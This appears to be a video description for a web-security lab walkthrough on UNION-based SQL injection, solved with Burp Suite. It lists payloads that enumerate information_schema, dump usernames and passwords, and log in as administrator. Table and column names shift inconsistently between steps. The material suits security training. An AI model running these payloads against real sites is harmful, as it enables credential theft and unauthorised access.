SQL INJECTION ATTACK, LISTING THE DATABASE CONTENTS ON NON-ORACLE DATABASES -Burp Suite

Описание

#burpsuite

Any simpler way? Please comment below, thank you!

How to Solve: SQL INJECTION ATTACK, LISTING THE DATABASE CONTENTS ON NON-ORACLE DATABASES

Please Hit Like and Subscribe! Thank you!

Hit: Access the Lab

Set the browser network setting to manual proxy (127.0.0.1:8080) 0:06

After the home page on your screen: copy paste the url for the Target Scope 0:16

Burp Proxy | Intercept-tab | Turn off the intercept| Click: Intercept is on - button | Intercept is off 0:29

Burp Proxy: HTTP History (refresh the Fox browser) 0:33

Click: Gifts - tab (You are free to choose any other category) 0:38

Go to Proxy - tab | HTTP history | Check GET - method column | /filter?category=Gifts at the URL-column | Send it to Burp Repeater (Ctrl-R) 0:58

Go to Repeater - tab | Request -side 1:00

In this video, I choose: Gifts as the category. You can choose any filter(I tried Lifestyle too).
GET /filter?category=Gifts HTTP/1.1

1st payload | Modify Row 1: 1:08
GET filter?category=Gifts'UNION+SELECT+'1','2'-- HTTP/1.1
Click Send - Request button | 1:23
Response-side | Row 1 | 200 OK 1:35
Analyze the Response, our goal is to get the version on the banner in the database:


browser: 'UNION+SELECT+'1','2'--

2:35
GET /filter?category=Gifts'UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
200 OK

Browser: Gifts'UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- 4:50

Find on the 5:00
users_scdtel

Modify row 1: 5:50
Gifts'UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_scdtel'-- 6:00
200 OK

Browser: Gifts'UNION+SELECT+column_name,NULL FROM information_schema.columns WHERE table_name='users_scdtel'-- 9:10

You will find (will be different with yours) 9:19
password_fdrreu
username_rwqlyi

Modify row 1: 12:00
Gifts%27UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name=%27users_glgzxj%27--
200 OK

Browser: 12:18
Gifts'UNION+SELECT+username_xirgxr,+password_wzjqse+FROM+users_glgzxj--

You will find (will be different with yours) 12:20
administrator
7tg7one...

Login 12:36
administrator
7tg7one...


Lab: Solved

Thank you for watching!

Disclaimer: Any actions and or activities related to the material contained within this channel is your responsibility. I am not responsible in the event of any criminal charges be brought against any individual misusing the information in this channel to break the law.